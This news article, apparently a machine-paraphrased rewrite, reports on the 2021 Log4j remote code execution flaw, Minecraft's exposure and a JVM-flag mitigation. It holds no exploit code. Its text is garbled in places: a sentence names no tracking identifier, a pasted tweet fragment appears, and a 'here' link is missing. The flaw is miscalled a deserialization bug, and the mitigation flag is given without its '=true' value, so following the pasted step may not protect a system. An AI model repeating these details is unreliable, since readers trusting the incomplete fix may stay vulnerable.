Zeroday in ubiquitous Log4j tool poses a grave threat to the Internet



Several websites reported on last Thursday that exploit code has been released for a serious code-execution vulnerability in Log4j, an open-source logging utility that's used in countless apps, including those used by large enterprise organizations.

The best-selling game of all time, Minecraft, was the first game to be exposed to the vulnerability. The sites warned that hackers could execute malicious code on server or clients running the Java version of the game by manipulating log messages. Log4j was identified as the source of the vulnerability and exploit code that was discovered online.

A big deal.

HD Moore, founder and CTO of network discovery platform Rumble, said that he thought the Minecraft side was a perfect storm, but that affected applications and devices would continue to be identified for a long time. The dependency on older versions for mod compatibility is a big deal for environments tied to older Java runtimes.

There are reports of internet-wide scans being performed to locate vulnerable server.

The new Apache Log4j RCE vulnerability is currently being scanned by 2 unique IP's.
>
A tag to track this activity will be made available soon and will be linked as a reply when released.

December 10, 2021.

Log4j is included in a number of popular frameworks. That means that a lot of third-party apps are vulnerable to exploits that carry the same high severity as those threatening users of Minecraft.

At the time this post went live, there wasn't much information about the vulnerability. One of the earliest sources to give a tracking number was Github, which said it was the vulnerability. There are currently many popular systems on the market that are affected by the Log4j RCE Zero day, according to the security firm Cyber Kendra.

Representatives from the Apache Foundation didn't respond to an email about the vulnerability. The recent fixing of a serious vulnerability is acknowledged by this Apache page. The Java deserialization bug is caused by Log4j making network requests through the JNDI to an LDAP server and executing any code that's returned. The bug is triggered inside of log messages.

Advertisement

Luna Sec said that Java versions greater than 6u211, 7u201, 8u191, and 11.0.1 aren't affected by the attack. The JNDI can't load a remote codebase in these versions.

Cloud services from Apple and Steam have also been found to be affected. A different high-severity vulnerability in struts led to the compromise of Equifax, which spilled sensitive details for more than 142 million US consumers.

The Log4j2 vulnerability was disclosed by the security team at the Alibaba Cloud in November. The latest version of Log4j2 is available here.

What does it mean for the game?

According to the Spigot gaming forum, all versions of the popular game, including the most recent 1.18 release, are vulnerable. The gaming server and news site urged players to take care.

The issue can allow remote access to your computer through the server you log into. Any public server you go onto creates a risk of being hacked.

Success for the exploits is dependent on the version of the Java framework that is running on top of theMinecraft app. It appears that older Java versions have less built-in security protections that make exploits easier.

Spigot said that adding the JVM flag -Dlog4j2.formatMsgNoLookups is a good way to counteract the threat for most Java versions. Spigot and many other services have put a flag in the games they make available to users.

To add the flag, users should open the installations tab, select the installation in use, and paste -Dlog4j2.formatMsgNoLookups at the end of the JVM flags.

For the time being, people should pay close attention to this vulnerability and its potential to cause high-impact attacks against a wide variety of apps and services. For users of the game, that means avoiding unknown or unreliable users. It means checking to see if the software uses Log4j or Log4j2 for logging. This is not a good story. If more information becomes available, updates will follow.